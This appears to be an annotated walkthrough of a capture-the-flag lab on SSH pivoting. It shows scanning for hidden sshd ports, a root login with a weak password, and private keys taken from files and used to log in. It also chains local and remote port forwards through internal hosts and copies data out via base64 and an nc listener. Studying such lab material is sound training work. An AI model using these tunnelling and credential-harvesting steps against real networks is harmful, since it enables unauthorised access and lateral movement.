# Optional convenience setup, per the section label below.
NICE_TO_HAVE
# Host label, not a command: the following lines are typed on "bchd"
# (presumably the operator's starting container - TODO confirm).
bchd
# Refresh the package index before installing anything.
apt update
# Install the man-page viewer and the less pager without prompting (-y).
apt install -y man less
# NOTE(review): on minimized Ubuntu images this restores man pages and other
# content stripped from the image, and it asks for confirmation - verify it
# exists on the image in use.
unminimize
# Walkthrough proper. Bare words such as "bchd", "redirector" and "server_1"
# appear to be host labels marking where the following commands are typed;
# trailing comments after a flag read appear to name the challenge.
STEPS
bchd
cd /root
# -a includes dotfiles, -l shows owner and mode of each entry.
ls -al
cat /root/flag.txt # So, you're finally awake
apt update
apt install -y nmap
# Service/version detection (-sV) on TCP 1337 only. nmap masks the address to
# the prefix, so 200.200.200.1/24 covers the whole 200.200.200.0/24 range.
nmap -p 1337 -sV 200.200.200.1/24
# sshd on a non-standard port; moving the port does not hide it from -sV.
ssh root@200.200.200.252 -p 1337
# password: pawn
# NOTE(review): direct root login with a short dictionary-word password is the
# weakness this step relies on; PermitRootLogin and PasswordAuthentication in
# the server's sshd_config are the settings that would close it.
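# Host label: the lines below run inside the SSH session opened on
# 200.200.200.252:1337 in the preceding step.
redirector
cat /root/flag.txt # Into the Unknown
# The patterns are quoted so find receives them literally. Unquoted, the shell
# expands *.txt / *flag* against the current directory first, which silently
# narrows the search to one name or makes find abort when several files match.
find / -type f -name '*.txt'
find / -type f -name '*flag*'
cat /tmp/flag.txt # Contact lens
# Close the session and return to bchd.
exit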
bchd
# Print the public key derived from the private key in /map.txt; a clean result
# confirms the file parses as a private key before it is used with -i.
ssh-keygen -y -f /map.txt
# Local forward through the redirector: bchd's 127.0.0.1:2111 is relayed to
# 200.200.200.111:22. -N runs no remote command, -f backgrounds ssh after
# authentication, and binding to 127.0.0.1 keeps the listener off the network.
ssh root@200.200.200.252 -p 1337 -NfL 127.0.0.1:2111:200.200.200.111:22
# Confirm the forward is listening (-a all sockets, -n numeric, -t TCP,
# -p owning process).
ss -antp | grep 2111
ssh -i /map.txt admin@127.0.0.1 -p 2111 # Opening Moves
# TODO: proxychains nmap line to scan for port 2222 on server_1
# Second hop: bchd's 127.0.0.1:2222 is relayed through the admin session to
# 172.16.2.31:2222 (presumably server_1 - TODO confirm).
ssh -i /map.txt admin@127.0.0.1 -p 2111 -NfL 127.0.0.1:2222:172.16.2.31:2222
ss -antp | grep 2222
# create file on bchd with provided key called wshaibel
# NOTE(review): ssh refuses private key files that other users can read, so the
# new file likely needs chmod 0400 (as is done for game-2.txt later) - confirm.
ssh wshaibel@127.0.0.1 -p 2222 -i wshaibel # Novice Tournament
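# Host label: the lines below run inside the wshaibel session.
server_1
# GatewayPorts decides whether a remote forward (-R) may bind a non-loopback
# address; by default sshd binds remote forwards to loopback only. grep reads
# the file directly, so the extra cat process is not needed.
grep GatewayPorts /etc/ssh/sshd_config # Novice - Game 1
# file identifies content by its magic bytes, not by the .enc extension.
file evidence_found_lens.enc # it's a zip!
# Emit the binary as base64 text so it can be copied out through the terminal.
base64 evidence_found_lens.enc
# Close the session and return to bchd.
exit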
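bchd
# copy back the b64 contents to bchd to file evidence_found_lens.enc.b64
# Decode the pasted text back into the original binary.
base64 -d evidence_found_lens.enc.b64 > evidence_found_lens.enc
# -y added so this install runs without a prompt, like the other apt installs
# in these notes.
apt install -y unzip
unzip evidence_found_lens.enc
# Password 123456
# NOTE(review): a password this common gives the archive no real
# confidentiality, and the .enc name does not change what the file is.
cat evidence_found_lens.txt # Novice - Game 3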
# Remote forward: the far sshd listens on 0.0.0.0:1031 and relays connections
# back to bchd's 127.0.0.1:1031. A non-loopback bind address on -R is honoured
# only when the server's GatewayPorts setting permits it; AllowTcpForwarding
# and GatewayPorts in sshd_config are the server-side controls for this.
# NOTE(review): the trailing "1031-1225" is not explained on the page -
# possibly a range of ports; TODO confirm.
ssh wshaibel@127.0.0.1 -p 2222 -i wshaibel -NfR 0.0.0.0:1031:127.0.0.1:1031 #1031-1225
ps aux | grep ssh # note the 1031 process id
apt install -y netcat
# Listen on 1031 (-l), numeric addresses only (-n), verbose (-v); tee keeps a
# copy of whatever arrives in game-2.txt.
# NOTE(review): this form matches OpenBSD netcat; netcat-traditional needs
# "-l -p 1031" - confirm which variant the package resolves to.
nc -nvl 1031 | tee game-2.txt
# within 60s data should be received - Novice - Game 2
# remove the flag from game-2.txt
# What remains is used as a private key below, so it must hold only key data.
# Owner read-only: ssh refuses private keys that other users can read.
chmod 0400 game-2.txt
# Printing the derived public key confirms the edited file still parses.
ssh-keygen -y -f game-2.txt
# Next hop: bchd's 127.0.0.1:22109 is relayed through the wshaibel session to
# 10.10.10.109:22.
ssh wshaibel@127.0.0.1 -p 2222 -i wshaibel -NfL 127.0.0.1:22109:10.10.10.109:22
ss -antp | grep 22109
ssh hmelling@127.0.0.1 -p 22109 -i game-2.txt # Expert Tournament
# NOTE(review): no host label here; the sshd setup below appears to run on bchd
# after leaving the hmelling session - confirm.
# Create a local account for the inbound connection to log in as.
adduser vborgov
su vborgov
cd ~
mkdir .ssh
vim ~/.ssh/authorized_keys
# add provided key
# Leave the vborgov shell; the package install below is done from the shell
# that ran su.
exit
# NOTE(review): rsyslog is presumably installed so sshd's auth messages are
# written to a log file - confirm.
apt install -y openssh-server rsyslog
# NOTE(review): the start/stop pair presumably lets the init script prepare
# host keys and runtime directories before sshd is run by hand - confirm.
/etc/init.d/ssh start
/etc/init.d/ssh stop
# Foreground sshd: -D does not detach, -d is debug mode, in which sshd does not
# fork and exits after serving one connection. It holds this terminal, so the
# following commands need a second shell.
/usr/sbin/sshd -D -d
# Remote forward: port 1666 on the hmelling host, all interfaces, is relayed
# to the local sshd on 127.0.0.1:22. Anything that can reach that port reaches
# this sshd, so the forward should be torn down once the upload has arrived.
ssh hmelling@127.0.0.1 -p 22109 -i game-2.txt -NfR 0.0.0.0:1666:127.0.0.1:22
ps aux | grep ssh
# watch for inbound connection
# new file should be uploaded via scp
# Confirm the uploaded file parses as a private key before using it.
ssh-keygen -y -f /home/vborgov/id_rsa
# Next hop: bchd's 127.0.0.1:22201 is relayed through the hmelling session to
# 192.168.200.201:22.
ssh hmelling@127.0.0.1 -p 22109 -i game-2.txt -NfL 127.0.0.1:22201:192.168.200.201:22
ss -antp | grep 22201
ssh bharmon@127.0.0.1 -p 22201 -i /home/vborgov/id_rsa